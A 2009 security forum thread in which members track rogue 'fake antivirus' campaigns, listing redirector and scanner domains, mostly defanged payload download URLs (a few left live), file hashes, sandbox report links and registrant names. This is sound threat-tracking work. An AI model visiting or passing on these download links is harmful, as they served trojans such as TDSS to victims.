VirusTotal (http://www.virustotal.com/analisis/73aa4d4f4d67a54a5af493043e502c34) - 7/40 (17.50%)
Title: Re: Rogue - Fake AV
Post by: SysAdMini on April 20, 2009, 10:20:51 am
205.252.24.226

Redirects to onlinespywarescanner.net

Code:
http://selectusers.com/tds3/in.cgi?6&camp=ron&cid=C8B673339383D26882AF488DB6B969329BCA7A4C7F5C7BE6&aid=4113&version=1.4.3
Fake AV
Code:
http://www.onlinespywarescanner.net/online-scan.html?ewmid=234&pwebmid=4113
82.98.193.102

Code:
http://tds1.onlineredirsystem.com/tds/in.cgi?22&cid=C8B673339383D26882AF488DB6B969329BCA7A4C7F5C7BE6&aid=4113

redirects to
60.29.232.32
Code:
http://managesystem32.com/file/3896/4c933a7c5bf131de422b01ba3fe07b12/last.exe
http://www.virustotal.com/analisis/d4068c22f4b4d4845801489b5104be1a 27/40
85.17.254.158
Code:
http://toppromooffer.com/vsm/adv/5/?a=cspyock-sst&l=373&f=cs_2185226204&ex=1&ed=2&h=&sub=csp&prodabbr=3P_UVSM
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 21, 2009, 04:34:24 pm
66.206.17.28

Code:
hxxp://scandata6.info/download/install.php
hxxp://scan6data.info/download/install.php
hxxp://scanmini6.info/download/install.php
hxxp://scan6lead.info/download/install.php
hxxp://scanlead6.info/download/install.php
hxxp://scan6list.info/download/install.php
hxxp://scanlist6.info/download/install.php
hxxp://scan6ever.info/download/install.php
hxxp://scan6fan.info/download/install.php

File name: install.exe
File size: 53248 bytes
MD5: fbc81c9ec9452a5b000d84f05d3b122c

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/11553c9baf07180cb3152c685382795b) - 21/40 (52.5%)

-----------------

66.206.17.28

Code:
hxxp://scanever6.info/download/xp/install.php
hxxp://scan6line.info/download/xp/install.php

File name: install.exe
File size: 40448 bytes
MD5: 5d254f2d27ff316097f76c76b8024fad

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/2ea7bb063248719a7894bde1860dbb5d) - 22/40 (55.00%)

-----------------

63.146.2.92

Code:
hxxp://scan4data.info/download/xp/install.php

File name: install.exe
File size: 40448 bytes
MD5: fbe0f66d8ddeecee4a41ff91fabac126

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/aa2b924d504d1d00382057261a5f0f20) - 22/40 (55%)

-----------------

63.146.2.92

Code:
hxxp://scandata4.info/download/xp/install.php

File name: install.exe
File size: 40448 bytes
MD5: 746dfd581f5eb4ceca4a9825eec23e5a

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/cec95f5f38d6be6cdb212be1d74b9a87)

-----------------

209.44.126.14

Code:
hxxp://basevirusscan.com/download.php
hxxp://basevirusscan.com/install/installpv.exe
hxxp://basevirusscan.com/install/ws.zip

VirusTotal: Trojan (http://www.virustotal.com/analisis/df3177374be6c16ba557b88b0bb9f3a1) - 12/40 (30%)
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/0e88b4a1ed30f5f179e91b4bfb035a79) - 10/40 (25%)
VirusTotal: Trojan (http://www.virustotal.com/analisis/d2799f12e546a088d757225314ea0ca6) - 12/38 (31.58%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 22, 2009, 06:02:16 pm
69.10.52.12

Code:
hxxp://plus5scan.com/download/install.php
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/4c2e0567331afe9ae7d06af93c2b8640) - 16/40 (40%)
Anubis Report (http://anubis.iseclab.org/?action=result&task_id=186e0006c73071db4c1790645e5dd85b5)

Second download:

Code:
hxxp://in5ik.com/download/file.exe
hxxp://in5ik.com/download/InternetAntivirusPro.exe
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/2f71a01ae3529e1372b97744e440c61a) - 15/40 (37.5%)
VirusTotal: Fake Antivirus (http://www.virustotal.com/analisis/440a4d00aeb6fd5860033b12a4f7f7ba) - 2/40 (5%)

Code:
hxxp://in5sk.com/download/file.exe
hxxp://in5sk.com/download/InternetAntivirusPro.exe
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/f2c9b35130dd267c7299f38508e19388) - 33/40 (82.5%)
VirusTotal: Fake Antivirus (http://www.virustotal.com/analisis/e63802831507e24828f5f35f2e727325) - 10/39 (25.65%)

Redirects to rogue

66.206.17.28

Code:
hxxp://gomixscan.com
Wepawet (http://wepawet.iseclab.org/view.php?hash=bc40fd6948f811f351938ce104644fc9&t=1240423269&type=js)

91.212.41.111

Code:
hxxp://zyne4ka.com/in.cgi?6
Wepawet (http://wepawet.iseclab.org/view.php?hash=d1ce2aa96ec6ae8b344092593a001d68&t=1240407755&type=js)

91.212.41.110

Code:
hxxp://melodynew.cn/in.cgi?6
Wepawet (http://wepawet.iseclab.org/view.php?hash=fd2416a6e18b9374ed86a0d88ad535a7&t=1240423498&type=js)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 22, 2009, 08:16:15 pm
209.44.126.14

Redirects:
Code: [Select]
hxxp://systemvirusscan.com/in.php
hxxp://systemvirusscan.com/hitin.php
hxxp://systemvirusscan.com/page.php

Fake scanner page:
Code: [Select]
hxxp://systemvirusscan.com/index.php
hxxp://systemvirusscan.com/scan.php

Payloads:
Code: [Select]
hxxp://systemvirusscan.com/download.php
hxxp://systemvirusscan.com/install/installpv.exe
hxxp://systemvirusscan.com/install/ws.zip

VirusTotal: Trojan (http://www.virustotal.com/analisis/066a3117e6392ec6de89ef903a6e15eb) - 11/40 (27.5%)
VirusTotal: Trojan (http://www.virustotal.com/analisis/c3d70a7166470c25fa0cdeab071bce85) - 4/40 (10%)
VirusTotal: Trojan (http://www.virustotal.com/analisis/2906c3804a25b35bb44976abbf28b41d) - 10/40 (25%)

Redirects:
Code: [Select]
hxxp://pcguardscan.com/in.php
hxxp://pcguardscan.com/hitin.php
hxxp://pcguardscan.com/page.php

Fake scanner page:
Code: [Select]
hxxp://pcguardscan.com/index.php
hxxp://pcguardscan.com/scan.php

Payloads:
Code: [Select]
hxxp://pcguardscan.com/download.php
hxxp://pcguardscan.com/install/installpv.exe
hxxp://pcguardscan.com/install/ws.zip

VirusTotal: Trojan (http://www.virustotal.com/analisis/0e2535e0cb9acab4f4a1def941383d82) - 11/40 (27.5%)
VirusTotal: Trojan (http://www.virustotal.com/analisis/184bf2330b8ede66498511b26b52f54e) - 4/40 (10%)
VirusTotal: Trojan (http://www.virustotal.com/analisis/ab4c0a6f3d17906a8200ee617bd30c92) - 10/40 (25%)

91.212.65.55

Redirects:
Code: [Select]
hxxp://justwebsecurity.com/in.php
hxxp://justwebsecurity.com/hitin.php

Fake scanner page:
Code: [Select]
hxxp://justwebsecurity.com/index.php
hxxp://justwebsecurity.com/scan.php

Payloads:
Code: [Select]
hxxp://justwebsecurity.com/download.php
hxxp://justwebsecurity.com/install/installpv.exe
hxxp://justwebsecurity.com/install/ws.zip

VirusTotal: Trojan (http://www.virustotal.com/analisis/e157555bb849b402e42c86ae70e15f97) - 9/40 (22.5%)
VirusTotal: Trojan (http://www.virustotal.com/analisis/bd698cc14d675908b33d2948317e3b34) - 4/40 (10%)
VirusTotal: Trojan (http://www.virustotal.com/analisis/9c9c8bc6b327ec57063ae7448db42d5a) - 10/40 (25%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 24, 2009, 08:49:46 am
66.206.17.32

Code: [Select]
hxxp://leadscan6.info/download/install.php
hxxp://list6scan.info/download/install.php
hxxp://litescan6.info/download/install.php
hxxp://listscan6.com/download/xp/install.php
hxxp://listscan6.info/download/xp/install.php
hxxp://scanever6.info/download/xp/install.php
hxxp://scan6line.info/download/xp/install.php
hxxp://scan6data.info/download/install.php
hxxp://scan6lead.info/download/install.php
hxxp://scan6fan.info/download/install.php
hxxp://scanlead6.info/download/install.php
hxxp://scanlist6.info/download/install.php
hxxp://scandata6.info/download/install.php
hxxp://scanlite6.info/download/install.php
hxxp://scanmini6.info/download/install.php

Quote
Size: 52736 bytes,
MD5: f5fcb03a6743e02e1978a0baa05e77fe

VirusTotal: Trojan InternetAntivirus (TDSS) (http://www.virustotal.com/analisis/04ab7be9f10d44be64b0ab6577cf79e2) - 13/40 (32.5%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=11a0eaa7d18539844014e013921ed358a&call=first)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 24, 2009, 09:28:33 am
Rootkit TDSS

64.146.2.92

Code: [Select]
hxxp://basescan4.info/download/install.php
hxxp://base4scan.info/download/xp/install.php
hxxp://bestscan4.info/download/install.php
hxxp://fastscan4.info/download/xp/install.php
hxxp://fast4scan.info/download/install.php
hxxp://scanany4.info/download/install.php
hxxp://scanbest4.info/download/install.php
hxxp://scan4ever.info/download/install.php
hxxp://scan4data.info/download/xp/install.php
hxxp://scandata4.info/download/install.php
hxxp://scan4fast.info/download/xp/install.php
hxxp://scanfast4.info/download/install.php
hxxp://scanever4.info/download/install.php
hxxp://scanuser4.info/download/xp/install.php
hxxp://scanzoom4.info/download/install.php
hxxp://plus4scan.info/download/xp/install.php
hxxp://plusscan4.info/download/install.php
hxxp://user4scan.info/download/install.php

 :o

Quote
Size:   40448 bytes,
MD5:   4b440cd5a8999d7088103279cda8786e

VirusTotal (http://www.virustotal.com/analisis/e2dfd4c8a325bf204287faf8cb773f71) - 13/40 (32.5%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=1e43f3b01d98760b4c93f30bcaa22cd9d)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 25, 2009, 07:19:35 pm
63.146.2.92

Code: [Select]
hxxp://scan4fuse.info/download/install.php
hxxp://scanfuse4.info/download/install.php
hxxp://fuse4scan.info/download/install.php
hxxp://fusescan4.info/download/install.php

Quote
Size:   40448 bytes,
MD5:   3afeafaf42a9e9caea12da0a0770521a

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/45293db3b3d2592d3444c924cc550460) - 19/40 (47.5%)
Anubis Report (http://anubis.iseclab.org/?action=result&task_id=1a08bbac7c6511de4a9a696abcf19edd1)

209.44.126.14 - FakeAV (Trojan Winwebsec)

Code: [Select]
hxxp://topwinsystemscan.com/download.php
hxxp://topwinsystemscan.com/install/installpv.exe
hxxp://topwinsystemscan.com/install/ws.zip

VirusTotal (http://www.virustotal.com/analisis/e77b7c7f587a9db013f1759b877442a4) - 13/40 (32.5%)
VirusTotal (http://www.virustotal.com/analisis/99e42964e42d7b523bb6eabdfee414dd) - 12/40 (30%)
VirusTotal (http://www.virustotal.com/analisis/3dd6e7c11663144c62ffaeafcd91b9a5) - 18/40 (45%)

Code: [Select]
hxxp://allvirusscannow.com/download.php
hxxp://allvirusscannow.com/install/installpv.exe
hxxp://allvirusscannow.com/install/ws.zip

VirusTotal (http://www.virustotal.com/analisis/30097e115a21df9abd08c8d9666ddc42) - 14/40 (35%)
VirusTotal (http://www.virustotal.com/analisis/1ff834dd412f58c47534968e831da2e6) - 12/40 (30%)
VirusTotal (http://www.virustotal.com/analisis/2947b22de084a2608167180fa19d2a53) - 19/40 (47.5%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 26, 2009, 12:06:31 am
63.146.2.92

Code: [Select]
hxxp://scanbase4.info/download/install.php
hxxp://scan4base.info/download/install.php

Quote
Size:   40448 bytes,
MD5:   3afeafaf42a9e9caea12da0a0770521a

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/b97e376fef65631fa338254f4aa883e4) - 20/40 (50%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 26, 2009, 05:43:11 am
194.165.4.77

Fake scanner page:
Code: [Select]
hxxp://tubeontvgl.com/scan/
Fake error page (codec):
Code: [Select]
hxxp://tubeontvgl.com/tube/
Payload:
Code: [Select]
hxxp://uploadmoviez.com/codec/.exe
VirusTotal: Trojan (http://www.virustotal.com/analisis/a52377729002dcaff13afdf0a3084ae3) - 13/40 (32.5%)
Anubis Report (http://anubis.iseclab.org/?action=result&task_id=1f2774cc69dfeac349132bf53af2a7821)

Redirects to rogue:

63.146.2.92
Code: [Select]
hxxp://goscanatom.com
91.207.61.48
Code: [Select]
hxxp://wovens.info/cgi-bin/counter?id=823509&k=if+i+could+tell+you+one+thing&ref
Wepawet Report (http://wepawet.iseclab.org/view.php?hash=58eda48786380026b51e5fb6557bb933&t=1240723534&type=js)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 26, 2009, 02:30:52 pm
66.96.252.199

Code: [Select]
hxxp://now4scan.info/download/install.php
hxxp://nowscan4.info/download/install.php
hxxp://open4scan.info/download/install.php
hxxp://openscan4.info/download/install.php
hxxp://scan4now.info/download/install.php
hxxp://scan4open.info/download/install.php
hxxp://scan4step.info/download/install.php
hxxp://scan4tool.info/download/install.php
hxxp://scannow4.info/download/install.php
hxxp://scanopen4.info/download/install.php
hxxp://scanstep4.info/download/install.php
hxxp://step4scan.info/download/install.php
hxxp://stepscan4.info/download/install.php
hxxp://toolscan4.info/download/install.php

Quote
File size: 40448 bytes
MD5: 8b9e917f497c0de02f75785bba7c763d
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/210d40e6ef1e6d7ae02d4600bbcafa05) - 14/40 (35%)
Anubis Report (http://anubis.iseclab.org/?action=result&task_id=1c582dcd046b86024fdaea67d0bdcec6c)

63.146.2.92

Code: [Select]
hxxp://any4scan.info/download/install.php
hxxp://anyscan4.info/download/install.php
hxxp://atom4scan.com/download/install.php
hxxp://atomscan4.com/download/install.php
hxxp://scan4any.info/download/xp/install.php
hxxp://scan4atom.com/download/xp/install.php
hxxp://scan4list.com/download/install.php
hxxp://scanstar4.com/download/xp/install.php
hxxp://zoom4scan.info/download/install.php

Quote
File size: 40448 bytes
MD5: 3afeafaf42a9e9caea12da0a0770521a
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/8d50c1d4b16806753c9cebeef2efe5a4) - 21/40 (52.5%)
Anubis Report (http://anubis.iseclab.org/?action=result&task_id=1c06ea3d9d0d462046da5035922b5c265&call=first)

69.10.52.11

Code: [Select]
hxxp://live5scan.info/download/install.php
hxxp://new5scan.info/download/install.php
hxxp://scan5best.info/download/install.php
hxxp://scan5live.info/download/install.php
hxxp://scan5new.info/download/install.php

Quote
File size: 40448 bytes
MD5: 5b1212ac7029c3135331e2d7e1c70d82
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/56ed514ffe6dd5f95e18e754f4a0b888) - 14/40 (35%)
Anubis Report (http://anubis.iseclab.org/?action=result&task_id=1af208a354fe3a58421fa96247f6d2155&call=first)

Second download:

Code: [Select]
hxxp://in5ih.com/download/file.exe
hxxp://in5ih.com/download/InternetAntivirusPro.exe
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/e6384b4ca8e9478c40c62a9f3d5969b5) - 13/40 (32.5%)
VirusTotal: Trojan InternetAntivirusPro (http://www.virustotal.com/analisis/72a3764ca178e9a9eea099d87389d096) - 7/40 (17.5%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 26, 2009, 02:38:52 pm
69.10.52.11
Code: [Select]
hxxp://best5scan.info/download.php
69.10.52.12
Code: [Select]
hxxp://fast5scan.com/download/install.php

Quote
Size:   40448 bytes
MD5:   5b1212ac7029c3135331e2d7e1c70d82
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/a8fb766959c6f1884db22ca882aba6ed) - 15/40 (37.5%)
Anubis Report (http://anubis.iseclab.org/?action=result&task_id=10634e077e64ec374d96e9c1b6770dd58&call=first)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 28, 2009, 08:11:23 am
Redirects to rogue:

91.212.41.110
Code: [Select]
hxxp://lemmydislikes.com/in.cgi?6
Wepawet (http://wepawet.iseclab.org/view.php?hash=01621d76957200dcb9262d4a2ff2b903&t=1240904152&type=js)

216.195.35.99
Code: [Select]
hxxp://seaarch.info/in.cgi?2&group=5&parameter=visual+basic+game+programs
Wepawet (http://wepawet.iseclab.org/view.php?hash=7d71709fb55bbd8b8bc8027db3dadc81&t=1240904358&type=js)

87.248.163.58
Code: [Select]
hxxp://098765.com/in.php
hxxp://999666999.com/in.php
hxxp://berrousmark2009.com/in.php
hxxp://dbytedelicious.com/in.php
hxxp://dbytedelicious.net/in.php
hxxp://dbytedelicious.org/in.php
hxxp://infidelirium.net/in.php
hxxp://infidelirium.org/in.php
hxxp://lastpoher.ru/in.php
hxxp://massmarker2009.com/in.php
hxxp://murtinreid.com/in.php
hxxp://murtinreid.net/in.php
hxxp://sendsometraff.com/in.php
hxxp://x-more-x.net/in.php
hxxp://zerromark2009.com/in.php
hxxp://zorroless.com/in.php

Wepawet (http://wepawet.iseclab.org/view.php?hash=d9530a5ce598802235f11ecebe1b2f26&t=1240904781&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=85772aca1dd07bb7041ac7c8f52bd06b&t=1240904777&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=97f2f2f23bab8f3c561b7062de206ad0&t=1240904769&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=104a4dda02430272b2f93348cb4fa43b&t=1240904767&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=e9f6b5b4e8f120c38e9d15c91f4d481c&t=1240904762&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=7eb57aa34d8cb0fc9449c577f99fc75a&t=1240904758&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=18a0fb8e189b382347f5636fdeb7e223&t=1240904746&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=d174d4ead6171bdf1e9e6655f925c332&t=1240904745&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=29637bfb47dd5ecd85bcf7760c68026c&t=1240904712&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=b52325038ee07b421b8fe63b081ee9a4&t=1240904696&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=68589203f390c92a92eef88873b1043c&t=1240904646&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=4c51e9d50ec80bbc0407f9c237db85f5&t=1240904645&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=6fd4722dce2d50dcb1d773f7958ec3fe&t=1240904638&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=41344d8160a15aad778076f1818a2bb8&t=1240904635&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=531bd6b95ff13ddb821861cdbdb5e045&t=1240904630&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=47db177a0ea274454ca4335499cee165&t=1240904628&type=js)

Rogue Antivirus:
209.44.126.14
Code: [Select]
hxxp://totalvirushield.com/download.php
hxxp://totalvirushield.com/download/installpv.exe
hxxp://totalvirushield.com/download/ws.zip
VirusTotal (http://www.virustotal.com/analisis/ee0e180e6f62cabbcdd672c30321ad56) - 16/40 (40%)
VirusTotal (http://www.virustotal.com/analisis/42b641e1d2baa348045ef0f591abe1bd) - 7/40 (17.5%)
VirusTotal (http://www.virustotal.com/analisis/4a2aad6e6be79c592bc54a781f61e492) - 3/40 (7.5%)

63.146.2.92
Code: [Select]
hxxp://home4scan.info/download/install.php
hxxp://scan4home.info/download/install.php
hxxp://scanhome4.info/download/install.php
hxxp://scan4gate.info/download/install.php
hxxp://scangate4.info/download/install.php
hxxp://gate4scan.info/download/install.php
hxxp://gatescan4.info/download/install.php

Quote
Size:   39936 bytes,
MD5:   126fa3ed7b131e8de7b4fee1b2ce0e21

VirusTotal (http://www.virustotal.com/analisis/38de509a64035df0315039b8ce6cde47) - 10/40 (25.00%)

Redirects to rogue:

63.146.2.92
Code: [Select]
hxxp://goscanarea.com
hxxp://goscanelite.com
hxxp://goscanfile.com
hxxp://goscanfix.com
hxxp://goscangoal.com
hxxp://goscankey.com
hxxp://goscanmeta.com
hxxp://goscanmore.com
hxxp://goscannote.com
hxxp://goscantop.com
hxxp://goscanwork.com
hxxp://goareascan.com
hxxp://goelitescan.com
hxxp://gofilescan.com
hxxp://gofixscan.com
hxxp://gogoalscan.com
hxxp://gokeyscan.com
hxxp://gometascan.com
hxxp://gomorescan.com

Wepawet (http://wepawet.iseclab.org/view.php?hash=32aabd3e946f282c65b2ef697b1a48da&t=1240905710&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=63cd27f869041868f03930d27abe4d87&t=1240905713&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=d60081626c0ae4ee1c3d0b3be232b8ea&t=1240905715&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=1b75e803a50fe43fe3ed554a69f1d78a&t=1240905717&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=521f3565677af04acd519b47ee0f290f&t=1240905722&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=212dc28829d7f0d4ec699e313dbf6994&t=1240905725&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=b02c31ff4a9cf7052b8e2e2641df716a&t=1240905730&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=02d121ab3094a2af9c009340477f5ae8&t=1240905735&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=175058d1b2c6841f436e7901aa1c9d08&t=1240905741&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=4f849da442311a8436ba3750366a19a2&t=1240905765&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=eb4e1ea2888d749f1adb0ed7a3463f29&t=1240905763&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=0dd85c4c2d32137b45df3a283e2579be&t=1240905761&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=e068a1fd02ef3035508944618bf0b57f&t=1240905774&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=c9376ff6781541d12fe1544219bd23c6&t=1240905781&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=43580ca6712cef6c349bb5c6ee4aff26&t=1240905789&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=791d4cf6cbaffe874e927eb6a4fdfc9f&t=1240905795&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=81588530d4078c77437abd636e7c87f5&t=1240905801&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=53608db70921af077207c8b591af68e7&t=1240905808&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=f00a9fa7f2cb1f6559c760c29fbf8eda&t=1240905814&type=js)

Redirects to rogue:

66.96.252.199
Code: [Select]
hxxp://gonotescan.com
hxxp://goscanwork.com
Wepawet (http://wepawet.iseclab.org/view.php?hash=ea5af7879c2d1a30bc526ea6a18b15bc&t=1240906151&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=eb4e1ea2888d749f1adb0ed7a3463f29&t=1240906164&type=js)

Rogue Antivirus:

66.96.252.199
Code: [Select]
hxxp://nowscan4.info/download/install/php
VirusTotal (http://www.virustotal.com/analisis/93a8a65bb8a40bd81236bd37ff149931) - 9/40 (22.5%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=1252d2eea57c45094cd8fbd09bc62da22)
Title: Re: Rogue - Fake AV
Post by: RS-232 on April 28, 2009, 09:57:29 am
Quote
hxxp://ha-virus2009.com/install/Installer.exe

Have fun exploring the rest of rogue av-related domains there...
http://www.bfk.de/bfk_dnslogger.html?query=80.79.118.186#result
http://www.bfk.de/bfk_dnslogger.html?query=80.79.118.190#result
http://www.bfk.de/bfk_dnslogger.html?query=94.75.253.92#result
http://www.bfk.de/bfk_dnslogger.html?query=124.217.238.169#result
http://www.bfk.de/bfk_dnslogger.html?query=212.95.53.246#result

Title: Re: Rogue - Fake AV
Post by: SysAdMini on May 02, 2009, 09:01:46 am
Code: [Select]
http://antivirus-powerful-scannerv2.com/download/Install_11-1.exe
http://www.virustotal.com/analisis/8ad4d65036ead9403f38442d5d5d8de8 7/40
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 02, 2009, 10:56:32 am
78.159.115.215 - 78.159.115.215.internetserviceteam.com

freegechscan.info - Louis Hayes - nalatch@ gmail.com
gechscannow.info - John Aschinger - plutommy@ gmail.com
gescanch.info - Louis Hayes - nalatch@ gmail.com
gescanchnow.info - Frederick Arva - bosotlet@ gmail.com
nowscangech.info - Frederick Arva - bosotlet@ gmail.com
scan4lite.info - John Aschinger - plutommy@ gmail.com
scanlite4.info - John Aschinger - plutommy@ gmail.com
lead4scan.info - John Aschinger - plutommy@ gmail.com
linescan4.info - John Aschinger - plutommy@ gmail.com
lite4scan.info - John Aschinger - plutommy@ gmail.com
litescan4.info - John Aschinger - plutommy@ gmail.com
listscan4.info - John Aschinger - plutommy@ gmail.com
list4scan.info - John Aschinger - plutommy@ gmail.com
livescan4.info - John Aschinger - plutommy@ gmail.com
scan4list.info - John Aschinger - plutommy@ gmail.com
scanlist4.info - John Aschinger - plutommy@ gmail.com
scan4lead.info - John Aschinger - plutommy@ gmail.com
scan4line.info - John Aschinger - plutommy@ gmail.com
scan4list.info - John Aschinger - plutommy@ gmail.com
scan4lite.info - John Aschinger - plutommy@ gmail.com
scanlite4.info - John Aschinger - plutommy@ gmail.com
scanlive4.info - John Aschinger - plutommy@ gmail.com

64.20.33.156

fuse6scan.info - George Fults - sigratzie@ gmail.com
fusescan6.info - George Fults - sigratzie@ gmail.com
scan6fuse.info - George Fults - sigratzie@ gmail.com
scanfuse6.info - George Fults - sigratzie@ gmail.com
step6scan.info - George Fults - sigratzie@ gmail.com
stepscan6.info - George Fults - sigratzie@ gmail.com
scanstep6.info - George Fults - sigratzie@ gmail.com
scan6step.info - George Fults - sigratzie@ gmail.com
scan6ray.info - George Fults - sigratzie@ gmail.com
scan6star.info - George Fults - sigratzie@ gmail.com
star6scan.info - George Fults - sigratzie@ gmail.com
ray6scan.info - George Fults - sigratzie@ gmail.com
Title: Re: Rogue - Fake AV
Post by: CkreM on May 03, 2009, 11:53:37 am
Fake AV:
Code: [Select]
system-protector.org
av-lookup.com
srv-scan.us
srv-scan.biz
Ms-scan.biz
Ms-scan.info
Ms-scan.net
ms-scan.org
Title: Re: Rogue - Fake AV
Post by: CkreM on May 03, 2009, 04:15:44 pm
Redirects to fake AV
Code: [Select]
2b0a74.beladen.net/indd.php
Fake AV:
Code: [Select]
onlinesecurityhost.com
scan4lux.info
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 03, 2009, 05:35:51 pm
I just ran another scan. 40 online on 3 different IPs.

The new ones are:

Code: [Select]
hxxp://main4scan.info
hxxp://mainscan4.info
hxxp://scanmain4.info
hxxp://scan4main.info
hxxp://scan4true.info
hxxp://scan4user.info
hxxp://scan4way.info
hxxp://scantrue4.info
hxxp://true4scan.info
hxxp://truescan4.info
hxxp://userscan4.info
hxxp://wayscan4.info
hxxp://zoomscan4.info

VirusTotal (http://www.virustotal.com/analisis/024c55e56547a1f7fca0f9b8d5d7a9d8) - 8/40 (20%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=120bb17cf9875c2b4c1b46d1ef1cd1bd8)

hosted on 209.44.126.102

Registrant Name: Benn Tinkman
Registrant Email: bnntnkmn@ gmail.com

(http://img159.imageshack.us/img159/6449/scana.jpg)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 03, 2009, 06:42:08 pm
78.159.115.215

Code: [Select]
hxxp://geninch.com/download/InternetAntivirusPro.exe
hxxp://geninch.com/download/file.exe
hxxp://stagech.com/reports/download-report.php?prod_id=9

VirusTotal: Trojan InternetAntivirusPro (http://www.virustotal.com/analisis/5c4940492fda07b45ce3477ee8e5b9c7) - 4/40 (10%)
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/29c886552407dbbdd844f2ef0aa6a68f) - 5/40 (12.5%)
Source: Anubis Report (http://anubis.iseclab.org/?action=result&task_id=19714ed1f1a73e6f4956dfc306ea48141&format=html)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 04, 2009, 09:16:35 pm
209.44.126.102

Code: [Select]
hxxp://scan4mega.info
hxxp://scanmega4.info
hxxp://mega4scan.info

Wepawet (http://wepawet.iseclab.org/view.php?hash=212dc28829d7f0d4ec699e313dbf6994&t=1241472157&type=js)
Anubis (http://anubis.iseclab.org/?action=result&task_id=1acb802af67b981e4d5b09f9331301705)
VirusTotal (http://www.virustotal.com/analisis/3fd8172c585e2a46b2f5e90293089e33) - 11/40 (27.50%)

Registrant Name: Benn Tinkman
Registrant Email: bnntnkmn@ gmail.com
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 04, 2009, 09:39:44 pm
209.44.126.22

Code: [Select]
hxxp://onlinebrandsecuritys.com/download.php
hxxp://onlinebrandsecuritys.com/install/ws.exe
hxxp://onlinebrandsecuritys.com/install/ws.zip

install.exe
VirusTotal (http://www.virustotal.com/analisis/0154de00e1dbea82c7ecad471bc9e8f1) - 19/40 (47.5%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=16d5655fba54d6644c51434d6719507a1)

TCP Connection Attempts:
Quote
72.232.229.50:80

ws.exe
VirusTotal (http://www.virustotal.com/analisis/ddf5308224d4b924b985df7c2a6966b7) - 17/40 (42.5%)

ws.zip
VirusTotal (http://www.virustotal.com/analisis/5ba23916abb0bcc33713572c31006162) - 11/40 (27.5%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 05, 2009, 01:58:38 am
78.159.115.215
Code: [Select]
hxxp://scanline4.info/download/install.php
hxxp://line4scan.info/download/install.php
Quote
Size:   40448 bytes,
MD5:   d6ae61a866d593b765c1c042c0525509
VirusTotal (http://www.virustotal.com/analisis/94fa4a8c7155c162737f547eb2a1bb32) - 8/40 (20%)
